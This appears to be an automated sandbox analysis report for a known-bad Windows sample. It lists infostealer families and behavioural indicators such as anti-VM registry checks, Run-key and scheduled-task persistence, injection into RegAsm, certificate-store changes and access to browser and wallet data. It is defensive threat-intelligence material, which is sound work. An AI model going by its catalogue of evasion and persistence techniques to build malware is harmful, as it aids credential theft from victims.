Analysis Overview
SHA256
d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb
Threat Level: Known bad
The file d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb was found to be: Known bad.
Malicious Activity Summary
RisePro
Detects Monster Stealer.
Lumma Stealer
RedLine payload
Amadey
Exela Stealer
Monster
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Grants admin privileges
Modifies Windows Firewall
Blocklisted process makes network request
Downloads MZ/PE file
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Checks computer location settings
Identifies Wine through registry keys
Loads dropped DLL
Checks BIOS information in registry
Executes dropped EXE
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Power Settings
Checks installed software on the system
Looks up external IP address via web service
AutoIT Executable
Hide Artifacts: Hidden Files and Directories
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Launches sc.exe
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Program crash
Embeds OpenSSL
Unsigned PE
Collects information from the system
Suspicious use of SetWindowsHookEx
Gathers system information
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Runs net.exe
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Gathers network information
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies system certificate store
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix
Analysis: static1
Detonation Overview
Reported
2024-06-18 12:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-18 12:27
Reported
2024-06-18 12:30
Platform
win10v2004-20240611-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Amadey
Detects Monster Stealer.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Exela Stealer
Lumma Stealer
Monster
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000017001\f2e8263483.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b22e0b08f0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\b22e0b08f0.exe" | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\wincfg.exe | C:\Windows\system32\winsvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\.co3BCC.tmp | C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe | N/A |
| File opened for modification | C:\Windows\system32\winsvc.exe | C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\winnet.exe | C:\Windows\system32\winsvc.exe | N/A |
| File opened for modification | C:\Windows\system32\.co3BCC.tmp | C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4432 set thread context of 2408 | N/A | C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4568 set thread context of 504 | N/A | C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3456 set thread context of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 3900 set thread context of 4944 | N/A | C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe | N/A |
| File created | C:\Windows\Tasks\explortu.job | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
